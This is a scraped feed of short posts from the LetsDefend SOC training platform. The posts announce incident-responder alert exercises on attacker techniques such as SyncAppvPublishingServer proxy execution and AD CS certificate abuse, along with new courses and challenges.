LetsDefend

:)

⚠️ New SOC Alert: SyncAppvPublishingServer Execution to Bypass PowerShell Restriction Attackers use SyncAppvPublishingServer.vbs (a legit Microsoft-signed script) to proxy PowerShell commands via wscript.exe, bypassing execution policy restrictions. This "living off the land" technique evades defenses by mimicking trusted system behavior. 👥 Role: Incident Responder 🛠️ Type: Persistence 💪 Difficulty: Medium 🔢 Event ID: 294

During investigating an SIEM alert

🤩 New Learning Path!!!!! You'll be ready to get a new certificate!

Expectations...

⚠️ New Challenge!

⚠️ New SOC Alert: Suspicious Certificate Management Activity Detected Attackers use suspicious certificate management to exploit misconfigured AD CS templates, requesting certs with elevated privileges (e.g., ESC1). This enables Kerberos auth as admins for lateral movement & persistence, evading password-based detection. 👥 Role: Incident Responder 🛠️ Type: C2 💪 Difficulty: High 🔢 Event ID: 293

Malware analyst.

Linux vs Windows

Notepad

Email Verification Records

⚠️ New Course: Threat Intelligence Reports Learn how to effectively create and analyze threat intelligence reports with this comprehensive course for SOC managers.

Cybersecurity life

⚠️ New Challenge: Silent Drain

SOC Team

⚠️ Unauthorized Template Modification Detected Attackers use “Unauthorized Template Modification Detected”‑style techniques to inject malicious code or references into document or certificate templates so that payloads are fetched or executed only when a user opens a file, bypassing static scanners and enabling stealthy persistence or privilege escalation. 👥 Role: Incident Responder 🛠️ Type: C2 💪 Difficulty: High 🔢 Event ID: 290

Linux commands

⚠️ New Course: Threat Intelligence Feeds and Platforms

Spyware

Being a SOC Analyst